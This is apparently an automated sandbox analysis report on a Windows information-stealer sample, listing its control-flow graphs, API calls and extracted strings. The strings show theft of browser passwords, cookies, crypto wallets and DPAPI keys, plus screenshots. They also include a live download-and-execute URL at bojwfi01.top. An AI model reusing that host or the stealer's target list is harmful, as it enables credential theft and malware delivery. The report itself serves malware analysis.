1100->1101 1102 415c3b-415c49 GetFileAttributesW 1100->1102 1263 4161eb call 40edc0 1101->1263 1102->1101 1103 415c4b-415c4d 1102->1103 1103->1094 1103->1101 1263->1094
                                            APIs
                                              • Part of subcall function 0040AA30: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,73BCF9C0,00000000), ref: 0040AA82
                                            • ExpandEnvironmentStringsW.KERNEL32(%AppData%\andian,?,00000208,73B74770,73BCFE60), ref: 00415C31
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00415C40
                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00415C60
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415C8D
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415CA2
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415CE2
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415D34
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415D86
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415DD8
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415E2A
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415E7C
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415ECE
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415EEC
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415EF8
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F04
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F10
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F1C
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F28
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F34
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415F74
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415FC6
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00416018
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0041606A
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 004160BC
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0041610E
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00416160
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041617E
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041618A
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00416196
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004161A2
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004161AE
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004161BA
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004161C6
                                              • Part of subcall function 00415BF0: ExpandEnvironmentStringsW.KERNEL32(%AppData%\,?,00000208), ref: 00414F0B
                                              • Part of subcall function 00415BF0: GetPrivateProfileStringW.KERNEL32 ref: 00414F4F
                                              • Part of subcall function 00415BF0: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00415030
                                              • Part of subcall function 0040DB70: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040DCA5
                                              • Part of subcall function 0040B220: ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\Desktop\*.txt,?,00000208,00000000,73B74770,00000000,004346F0,000000FF), ref: 0040B25B
                                              • Part of subcall function 0040DB70: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E56C
                                              • Part of subcall function 0040EDC0: ExpandEnvironmentStringsW.KERNEL32(%Temp%\File.exe,00000000,00000208), ref: 0040EDD4
                                              • Part of subcall function 0040EDC0: DeleteFileW.KERNEL32(00000000), ref: 0040EDDE
                                              • Part of subcall function 0040EDC0: Sleep.KERNEL32(?), ref: 0040EE18
                                              • Part of subcall function 0040EDC0: URLDownloadToFileW.URLMON(00000000,http://bojwfi01.top/download.php?file=lv.exe,00000000,00000000,00000000), ref: 0040EE2E
                                              • Part of subcall function 0040EDC0: Sleep.KERNEL32(?), ref: 0040EE68
                                              • Part of subcall function 0040EDC0: CreateFileW.KERNEL32(00000080,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040EE89
                                              • Part of subcall function 0040EDC0: CloseHandle.KERNEL32(00000000), ref: 0040EE95
                                              • Part of subcall function 0040EDC0: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040EEAD
                                            • ExitProcess.KERNEL32 ref: 004161F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentExpandStrings$Create$Directory$File$Sleep$AttributesCloseDeleteDownloadExecuteExitHandleOpenPrivateProcessProfileShellString
                                            • String ID: %AppData%\$%AppData%\andian$%Temp%\$%s\key3.db$%s\key4.db$%s\logins.json$%s\signons.sqlite$%wS\Mozilla\Firefox\%wS$%wS\Mozilla\Firefox\profiles.ini$%wS\cookies.sqlite$%wS\formhistory.sqlite$Path$Profile0$\_Files$\_Files\_Brave$\_Files\_Chrome$\_Files\_Files$\_Files\_Firefox$\_Files\_Firefox\cookies.sqlite$\_Files\_Firefox\formhistory.sqlite$\_Files\_Firefox\key3.db$\_Files\_Firefox\key4.db$\_Files\_Firefox\logins.json$\_Files\_Firefox\signons.sqlite$\_Files\_Opera$\_Files\_Wallet$\files_$\files_\_Brave$\files_\_Chrome$\files_\_Firefox$\files_\_Firefox\cookies.sqlite$\files_\_Firefox\formhistory.sqlite$\files_\_Firefox\key3.db$\files_\_Firefox\key4.db$\files_\_Firefox\logins.json$\files_\_Firefox\signons.sqlite$\files_\_Opera$\files_\cryptocurrency$\files_\files
                                            • API String ID: 820267607-3351232602
                                            • Opcode ID: 590af48cf1a46fa54088ddcb9384379e6d0ee002ea2df3c89b367fcc22eff2ec
                                            • Instruction ID: 55fb6321524328c086458930c7ba30cc0fcf9cd4176fa1aeff9e66a68de170c6
                                            • Opcode Fuzzy Hash: 590af48cf1a46fa54088ddcb9384379e6d0ee002ea2df3c89b367fcc22eff2ec
                                            • Instruction Fuzzy Hash: E7D19275A1430166E620FB71CC46A9FB7989FA4348F40483EF449A21E7EF3DE60DC65A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1424 40ad20-40aed7 call 40f2f0 call 40f5a0 ExpandEnvironmentStringsW call 40f2f0 call 40f5a0 ExpandEnvironmentStringsW 1438 40aed9-40aeee 1424->1438 1439 40af0e-40b009 GetDesktopWindow GetWindowRect GetWindowDC GetDeviceCaps CreateCompatibleDC CreateDIBSection 1424->1439 1440 40aef0-40aefe 1438->1440 1441 40af04-40af0b call 416377 1438->1441 1447 40b00b-40b016 DeleteDC * 2 GdiplusShutdown 1439->1447 1448 40b01c-40b071 SaveDC SelectObject BitBlt RestoreDC DeleteDC * 2 GdipAlloc 1439->1448 1440->1441 1442 40b1ff-40b204 call 41d399 1440->1442 1441->1439 1447->1448 1450 40b073-40b098 GdipCreateBitmapFromHBITMAP 1448->1450 1451 40b09a 1448->1451 1452 40b0a1-40b0f7 GdipGetImageEncodersSize 1450->1452 1451->1452 1453 40b178-40b19b GdipSaveImageToFile 1452->1453 1454 40b0f9-40b109 call 41d3ea 1452->1454 1456 40b1a0-40b1e2 DeleteObject GdiplusShutdown CopyFileW 1453->1456 1457 40b19d 1453->1457 1454->1453 1459 40b10b-40b11d GdipGetImageEncoders 1454->1459 1457->1456 1461 40b16f 1459->1461 1462 40b11f 1459->1462 1463 40b170-40b175 call 41d1c2 1461->1463 1464 40b122-40b129 1462->1464 1463->1453 1466 40b130-40b136 1464->1466 1468 40b156-40b158 1466->1468 1469 40b138-40b13b 1466->1469 1472 40b15b-40b15d 1468->1472 1470 40b152-40b154 1469->1470 1471 40b13d-40b145 1469->1471 1470->1472 1471->1468 1473 40b147-40b150 1471->1473 1474 40b1e3-40b1f5 1472->1474 1475 40b163-40b16a 1472->1475 1473->1466 1473->1470 1474->1463 1475->1464 1476 40b16c 1475->1476 1476->1461
                                            APIs
                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,00000000,73AFE730), ref: 0040ADA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentExpandStrings
                                            • String ID: %Temp%\$\_Files\_Screen_Desktop.jpeg$\files_\screenshot.jpg$image/jpeg
                                            • API String ID: 237503144-1383429242
                                            • Opcode ID: f6afea1c73b2c4c2b044752672ac31201067c2b0b89293c78fcd6b11750ac7c7
                                            • Instruction ID: 1522f25109f37b898f11d4a3a15fb65eff52795cbdccf4546b361e04eb0b9b7a
                                            • Opcode Fuzzy Hash: f6afea1c73b2c4c2b044752672ac31201067c2b0b89293c78fcd6b11750ac7c7
                                            • Instruction Fuzzy Hash: 46C17AB1D002199BDB20DFA4CD49BAEBBB5FF08704F10416AE509B7290D7799A44CFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1526 414000-414010 1527 414012-414021 1526->1527 1528 414024-414028 1526->1528 1529 41402a-414039 1528->1529 1530 41403c-414059 1528->1530 1531 414060-41406e 1530->1531 1531->1531 1532 414070-41407b 1531->1532 1533 41407d-41408c 1532->1533 1534 41408f-41409e 1532->1534 1535 4140a0-4140a4 1534->1535 1536 4140a6 1535->1536 1537 4140a9-4140b5 1535->1537 1536->1537 1537->1535 1538 4140b7-4140c9 1537->1538 1539 4140d0-4140d9 1538->1539 1539->1539 1540 4140db-4140f2 1539->1540 1541 4140f4-4140f8 1540->1541 1542 414108-414111 1540->1542 1541->1542 1543 4140fa-414106 1541->1543 1544 414113-414117 1542->1544 1545 41411d-41412d call 422ad0 1542->1545 1543->1541 1543->1542 1544->1545 1546 4141b5-4141f5 1544->1546 1553 4141ad 1545->1553 1554 41412f-41413f call 422ad0 1545->1554 1548 4141f7-414208 1546->1548 1549 41420b-414226 CreateFileW 1546->1549 1551 414228-414239 1549->1551 1552 41423c-414249 call 413a40 1549->1552 1559 414261-4142ad WideCharToMultiByte 1552->1559 1560 41424b-41425e CloseHandle 1552->1560 1553->1546 1554->1553 1561 414141-414151 call 422ad0 1554->1561 1563 4142b0-4142b5 1559->1563 1561->1553 1566 414153-414163 call 422ad0 1561->1566 1563->1563 1565 4142b7-41431b 1563->1565 1567 414327-414344 1565->1567 1568 41431d-414322 1565->1568 1566->1553 1576 414165-414175 call 422ad0 1566->1576 1570 414353 1567->1570 1571 414346-414348 1567->1571 1568->1567 1573 41435b-414469 call 412c40 1570->1573 1571->1570 1572 41434a-414351 1571->1572 1572->1573 1579 4144a1-4144b4 1573->1579 1580 41446b-414472 1573->1580 1576->1553 1584 414177-414187 call 422ad0 1576->1584 1585 4144b6-4144bd 1579->1585 1586 4144ea-414503 1579->1586 1582 414482-41448c 1580->1582 1583 414474-414479 1580->1583 1590 41448f 1582->1590 1583->1582 1589 41447b-41447c CloseHandle 1583->1589 1584->1553 1602 414189-414199 call 422ad0 1584->1602 1592 4144d0-4144e7 1585->1592 1593 4144bf-4144c4 1585->1593 1587 414552-414559 1586->1587 1588 414505-414509 1586->1588 1595 414574 1587->1595 1596 41455b-414571 GetDesktopWindow GetTickCount call 41da22 1587->1596 1588->1587 1594 41450b-414550 1588->1594 1589->1582 1597 414494-41449e 1590->1597 1593->1592 1599 4144c6-4144cd CloseHandle 1593->1599 1594->1587 1594->1588 1601 414576-414586 call 41da01 1595->1601 1596->1595 1599->1592 1608 414588-414591 1601->1608 1602->1553 1609 41419b-4141ab call 422ad0 1602->1609 1610 414595-414601 1608->1610 1609->1546 1609->1553 1610->1610 1613 414603-414607 1610->1613 1614 414609-41461b call 4138f0 1613->1614 1615 41461d-41462e 1613->1615 1614->1615 1616 414640-414642 1615->1616 1617 414630-414637 call 413cb0 1615->1617 1621 414644-41465d call 413bf0 1616->1621 1622 41469b-4146a6 1616->1622 1623 41463c-41463e 1617->1623 1631 41468b-414691 1621->1631 1632 41465f 1621->1632 1624 4146b6-4146d1 1622->1624 1625 4146a8-4146ad 1622->1625 1623->1622 1624->1597 1628 4146d7-4146d9 1624->1628 1625->1624 1627 4146af-4146b0 CloseHandle 1625->1627 1627->1624 1628->1590 1630 4146df-4146fd 1628->1630 1634 414703-414705 1630->1634 1635 41483b-414844 1630->1635 1633 414693-414697 1631->1633 1636 414660-414663 1632->1636 1633->1622 1634->1635 1639 41470b-41471b 1634->1639 1637 414a71-414a80 1635->1637 1638 41484a-41484c 1635->1638 1636->1631 1640 414665-414670 call 4138f0 1636->1640 1641 414859-4149d7 call 4138f0 * 16 1638->1641 1642 41484e-414853 1638->1642 1643 41472a-414748 1639->1643 1644 41471d-414725 1639->1644 1655 414676-414689 call 413bf0 1640->1655 1656 414769-41476e 1640->1656 1678 4149dc-4149e1 1641->1678 1642->1637 1642->1641 1647 414778-41477d 1643->1647 1648 41474a-41474d 1643->1648 1644->1643 1650 414821-414838 1647->1650 1651 414783-41478b SetFilePointer 1647->1651 1653 414773-414776 1648->1653 1654 41474f-414766 1648->1654 1657 41478d-41479c call 412c40 1651->1657 1653->1657 1655->1631 1655->1636 1656->1633 1657->1590 1665 4147a2-4147a8 1657->1665 1667 4147c3-4147c7 1665->1667 1668 4147aa-4147c0 1665->1668 1670 4147c9-4147cc 1667->1670 1671 4147ef-4147f4 1667->1671 1673 4147e7-4147ea 1670->1673 1674 4147ce-4147e4 1670->1674 1676 4147f6-414803 SetFilePointer 1671->1676 1677 414808-41481e 1671->1677 1673->1678 1676->1678 1678->1597 1680 4149e7-414a31 call 4165fe call 4196c0 call 416347 1678->1680 1695 414a33-414a42 1680->1695 1696 414a45-414a4d 1680->1696 1698 414a5c-414a6e 1696->1698 1699 414a4f 1696->1699 1701 414a50-414a5a 1699->1701 1701->1698 1701->1701
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo$K$UT$in-gdi-devcaps-l1-1-0
                                            • API String ID: 0-4262956999
                                            • Opcode ID: f03331c6ac05f747e4f7f4c986c34046f026abb5f3e244967c3a46c6bcb45a45
                                            • Instruction ID: 9e89e10497af72fa126ed8da9896f6259446c266e342fc3784c8ba1e4e575486
                                            • Opcode Fuzzy Hash: f03331c6ac05f747e4f7f4c986c34046f026abb5f3e244967c3a46c6bcb45a45
                                            • Instruction Fuzzy Hash: 1652C2716043408BDB24DF29D8817ABBBE4AF95305F04056EFD84CB382D779D989CB9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1769 401220-40123d GetFileAttributesW 1770 4012ba-4012c3 1769->1770 1771 40123f-401241 1769->1771 1771->1770 1772 401243-40125f CreateFileW 1771->1772 1772->1770 1773 401261-401275 GetFileSizeEx 1772->1773 1774 4012b7-4012b8 CloseHandle 1773->1774 1775 401277-40127b 1773->1775 1774->1770 1775->1774 1776 40127d-401281 1775->1776 1777 401521-401523 1776->1777 1778 401287-40129c CreateFileMappingW 1776->1778 1780 401525-401526 CloseHandle 1777->1780 1781 401528-401531 1777->1781 1778->1774 1779 40129e-4012b2 MapViewOfFile 1778->1779 1782 4012c4-4012cb 1779->1782 1783 4012b4-4012b5 CloseHandle 1779->1783 1780->1781 1784 4012e0-4012f3 call 4105c0 1782->1784 1785 4012cd-4012d1 1782->1785 1783->1774 1790 4012f9-4012fd 1784->1790 1791 40150d-40151d UnmapViewOfFile FindCloseChangeNotification 1784->1791 1785->1784 1786 4012d3-4012d7 1785->1786 1786->1784 1788 4012d9-4012dc 1786->1788 1788->1784 1792 401303-401308 1790->1792 1793 401506-401508 call 410cb0 1790->1793 1791->1777 1792->1793 1794 40130e-40131f call 4101a0 1792->1794 1793->1791 1794->1793 1798 401325-401329 1794->1798 1798->1793 1799 40132f-401334 1798->1799 1799->1793 1800 40133a-40134b call 4101a0 1799->1800 1800->1793 1803 401351-401355 1800->1803 1803->1793 1804 40135b-401360 1803->1804 1805 401502 1804->1805 1806 401366-40136b 1804->1806 1805->1793 1807 401370-401375 1806->1807 1807->1807 1808 401377-40138b call 41d3ea 1807->1808 1811 401391-401397 1808->1811 1812 4014fe 1808->1812 1813 401449-401461 call 41cb70 1811->1813 1814 40139d 1811->1814 1812->1805 1821 401467-401496 CryptUnprotectData 1813->1821 1822 4014ea-4014fa call 41d1c2 1813->1822 1815 4013a0-4013a2 1814->1815 1817 4013a4-4013a6 1815->1817 1819 4013a8-4013aa 1817->1819 1820 4013ea-4013ec 1817->1820 1825 4013b0-4013b2 1819->1825 1823 40143d-40143f 1820->1823 1824 4013ee-401428 1820->1824 1821->1822 1827 401498-40149e 1821->1827 1822->1812 1823->1815 1829 401445 1823->1829 1824->1823 1828 40142a 1824->1828 1830 4013b4-4013bc 1825->1830 1831 4013dd-4013e0 1825->1831 1827->1822 1833 4014a0-4014a6 1827->1833 1834 401430-40143b 1828->1834 1829->1813 1835 4013d3 1830->1835 1836 4013be-4013c9 1830->1836 1839 4013e4-4013e8 1831->1839 1837 4014a8-4014b8 call 4196c0 1833->1837 1838 4014ba-4014c6 LocalFree 1833->1838 1834->1823 1834->1834 1840 4013d5-4013d7 1835->1840 1836->1840 1841 4013cb-4013cd 1836->1841 1837->1838 1838->1822 1843 4014c8-4014d7 call 41d3ea 1838->1843 1839->1817 1839->1820 1840->1825 1846 4013d9-4013db 1840->1846 1841->1835 1845 4013cf-4013d1 1841->1845 1843->1822 1849 4014d9-4014e8 call 4196c0 1843->1849 1845->1840 1846->1831 1846->1839 1849->1822
                                            APIs
                                            • GetFileAttributesW.KERNEL32(?), ref: 00401234
                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401250
                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401267
                                            • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040128E
                                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 004012A4
                                            • CloseHandle.KERNEL32(00000000), ref: 004012B5
                                            • CloseHandle.KERNEL32(00000000), ref: 004012B8
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040148E
                                            • LocalFree.KERNEL32(?), ref: 004014BB
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040150E
                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 0040151B
                                            • CloseHandle.KERNEL32(00000000), ref: 00401526
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Close$Handle$CreateView$AttributesChangeCryptDataFindFreeLocalMappingNotificationSizeUnmapUnprotect
                                            • String ID: DPAPI$encrypted_key$os_crypt
                                            • API String ID: 3228393713-3106839558
                                            • Opcode ID: cd02580d7a1e1de45017eb1408fbbe76704b4724033a608b9f5f22f3c3f17c59
                                            • Instruction ID: f7559763435f93ac33515ea846f2b948309a20a6e1d57b0678ee0fb662a16498
                                            • Opcode Fuzzy Hash: cd02580d7a1e1de45017eb1408fbbe76704b4724033a608b9f5f22f3c3f17c59
                                            • Instruction Fuzzy Hash: 819104715043406FE7209F6488C4B6B7BE8AB86354F08457EF985A73A2D639DC09C7AA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1883 40a6e3-40a6ef GetFileAttributesW 1884 40a6f1-40a6f3 1883->1884 1885 40a72b-40a733 1883->1885 1884->1885 1888 40a6f5-40a6fc 1884->1888 1886 40a735-40a741 GetFileAttributesW 1885->1886 1887 40a77d-40a791 GetSystemInfo 1885->1887 1886->1887 1891 40a743-40a745 1886->1891 1889 40aa11-40aa23 1887->1889 1890 40a797-40a7a4 KiUserCallbackDispatcher 1887->1890 1892 40a715-40a728 call 41da01 1888->1892 1893 40a6fe-40a70e call 41f0f7 call 41da22 1888->1893 1890->1889 1895 40a7aa-40a7d0 GlobalMemoryStatusEx 1890->1895 1891->1887 1896 40a747-40a74e 1891->1896 1892->1885 1893->1892 1900 40a7d2-40a7d8 1895->1900 1901 40a7de-40a7e4 1895->1901 1902 40a750-40a760 call 41f0f7 call 41da22 1896->1902 1903 40a767-40a77a call 41da01 1896->1903 1900->1889 1900->1901 1906 40a7e6-40a7e8 1901->1906 1907 40a7ee-40a828 call 417b20 RegOpenKeyExW 1901->1907 1902->1903 1903->1887 1906->1889 1906->1907 1915 40a847-40a86d RegCloseKey 1907->1915 1916 40a82a-40a841 RegQueryValueExW 1907->1916 1918 40a870-40a879 1915->1918 1916->1915 1918->1918 1919 40a87b-40a8db call 40f0f0 call 40fbd0 1918->1919 1924 40a8f3-40a906 1919->1924 1925 40a8dd 1919->1925 1927 40a978 1924->1927 1928 40a908-40a91f call 433800 1924->1928 1926 40a8e0-40a8f1 call 40fdb0 1925->1926 1926->1924 1930 40a97b-40a987 1927->1930 1928->1927 1940 40a921-40a92c 1928->1940 1933 40a9b0-40a9c8 1930->1933 1934 40a989-40a994 1930->1934 1936 40a9ca-40a9dc 1933->1936 1937 40a9fe-40aa10 1933->1937 1938 40a9a6-40a9ad call 416377 1934->1938 1939 40a996-40a9a4 1934->1939 1941 40a9f4-40a9fb call 416377 1936->1941 1942 40a9de-40a9ec 1936->1942 1938->1933 1939->1938 1943 40aa24-40aa29 call 41d399 1939->1943 1945 40a94a-40a94c 1940->1945 1946 40a92e-40a930 1940->1946 1941->1937 1942->1943 1947 40a9ee 1942->1947 1948 40a953-40a955 1945->1948 1952 40a932-40a938 1946->1952 1953 40a94e-40a950 1946->1953 1947->1941 1955 40a9f0-40a9f2 1948->1955 1956 40a95b-40a976 call 433800 1948->1956 1952->1953 1954 40a93a-40a940 1952->1954 1953->1948 1954->1953 1959 40a942-40a948 1954->1959 1955->1930 1956->1927 1956->1940 1959->1945 1959->1953
                                            APIs
                                            • GetFileAttributesW.KERNEL32(?), ref: 0040A6EA
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040A73C
                                            • GetSystemInfo.KERNEL32(?), ref: 0040A784
                                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040A799
                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0040A7BB
                                            • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0040A820
                                            • RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0040A841
                                            • RegCloseKey.KERNEL32(?), ref: 0040A84A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile$CallbackCloseDispatcherGlobalInfoMemoryOpenQueryStatusSystemUserValue
                                            • String ID: @$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$Xeon$aH
                                            • API String ID: 3694004270-2543718681
                                            • Opcode ID: 7db4a608c25a5fe6603510fc05f852b889ef91ee5e868d81ed31fb5a9d213069
                                            • Instruction ID: a11e35099914a2f539c488e99af5bd2085348f9a9993ce1602002415f301acf8
                                            • Opcode Fuzzy Hash: 7db4a608c25a5fe6603510fc05f852b889ef91ee5e868d81ed31fb5a9d213069
                                            • Instruction Fuzzy Hash: A8914771A003089BDB24DB68CC89BEEB7B5AF05314F14067AE545F32C1D73CA995CB6A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,73BCF9C0,00000000), ref: 0040AA82
                                            • RegCloseKey.KERNEL32(?,?,73BCF9C0,00000000), ref: 0040AAB4
                                            • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,?,?,73BCF9C0,00000000), ref: 0040AAE8
                                            Strings
                                            • %Temp%\, xrefs: 0040AB98
                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040AA78
                                            • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040AADE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Open$Close
                                            • String ID: %Temp%\$HARDWARE\DESCRIPTION\System\CentralProcessor\0$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 3083169812-543569672
                                            • Opcode ID: 66a16b0f935fb420fa7c91cd940e6ca25ca8ab4681ea2d4e824e6ab3cb95ddac
                                            • Instruction ID: 0b16ead8e416f8bf484ad7ef3fd71992627c41dd9fe8b2a19809a379e06530f0
                                            • Opcode Fuzzy Hash: 66a16b0f935fb420fa7c91cd940e6ca25ca8ab4681ea2d4e824e6ab3cb95ddac
                                            • Instruction Fuzzy Hash: AE51A471A40208ABEB14DBA4DD89FEEB779FB04304F50412AF505B32D1DB79A944CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2511 429d74-429d9c call 429956 call 4299b4 2516 429f42-429f7a call 41d3b6 call 429956 call 4299b4 2511->2516 2517 429da2-429dae call 42995c 2511->2517 2543 42a0a2-42a0fe call 41d3b6 call 41d0ea 2516->2543 2544 429f80-429f8c call 42995c 2516->2544 2517->2516 2522 429db4-429dbf 2517->2522 2524 429dc1-429dc3 2522->2524 2525 429df5-429dfe call 424bd8 2522->2525 2527 429dc5-429dc9 2524->2527 2534 429e01-429e06 2525->2534 2531 429de5-429de7 2527->2531 2532 429dcb-429dcd 2527->2532 2537 429dea-429dec 2531->2537 2535 429de1-429de3 2532->2535 2536 429dcf-429dd5 2532->2536 2534->2534 2539 429e08-429e29 call 425373 call 424bd8 2534->2539 2535->2537 2536->2531 2540 429dd7-429ddf 2536->2540 2541 429df2 2537->2541 2542 429f3e-429f41 2537->2542 2539->2542 2559 429e2f-429e32 2539->2559 2540->2527 2540->2535 2541->2525 2560 42a100-42a106 2543->2560 2561 42a108-42a10b 2543->2561 2544->2543 2551 429f92-429f9e call 429988 2544->2551 2551->2543 2562 429fa4-429fc5 call 424bd8 GetTimeZoneInformation 2551->2562 2563 429e35-429e3a 2559->2563 2564 42a14e-42a160 2560->2564 2561->2564 2565 42a10d-42a11d call 425373 2561->2565 2575 42a080-42a0a1 call 429950 call 429944 call 42994a 2562->2575 2576 429fcb-429fec 2562->2576 2563->2563 2567 429e3c-429e4e call 4242b8 2563->2567 2568 42a162-42a165 2564->2568 2569 42a170 call 429f52 2564->2569 2580 42a127-42a140 call 41d0ea 2565->2580 2581 42a11f 2565->2581 2567->2516 2586 429e54-429e67 call 42ff3c 2567->2586 2568->2569 2573 42a167-42a16e call 429d74 2568->2573 2584 42a175-42a18a call 424bd8 call 416e2c 2569->2584 2573->2584 2582 429ff6-429ffd 2576->2582 2583 429fee-429ff3 2576->2583 2605 42a142-42a143 2580->2605 2606 42a145-42a14b call 424bd8 2580->2606 2588 42a120-42a125 call 424bd8 2581->2588 2589 42a00f-42a011 2582->2589 2590 429fff-42a006 2582->2590 2583->2582 2586->2516 2608 429e6d-429e70 2586->2608 2612 42a14d 2588->2612 2597 42a013-42a03c call 42c945 call 42b755 2589->2597 2590->2589 2596 42a008-42a00d 2590->2596 2596->2597 2623 42a04a-42a04c 2597->2623 2624 42a03e-42a041 2597->2624 2605->2588 2606->2612 2610 429e72-429e76 2608->2610 2611 429e78-429e7e 2608->2611 2610->2608 2610->2611 2618 429e80 2611->2618 2619 429e81-429e8e call 424b7b 2611->2619 2612->2564 2618->2619 2628 429e91-429e96 2619->2628 2627 42a04e-42a06c call 42b755 2623->2627 2624->2623 2626 42a043-42a048 2624->2626 2626->2627 2634 42a07b-42a07e 2627->2634 2635 42a06e-42a071 2627->2635 2630 429e98-429e9d 2628->2630 2631 429e9f-429ea0 2628->2631 2630->2631 2633 429ea2-429ea5 2630->2633 2631->2628 2636 429ef3-429ef6 2633->2636 2637 429ea7-429ebe call 424b7b 2633->2637 2634->2575 2635->2634 2638 42a073-42a079 2635->2638 2639 429ef8-429efa 2636->2639 2640 429efd-429f11 2636->2640 2646 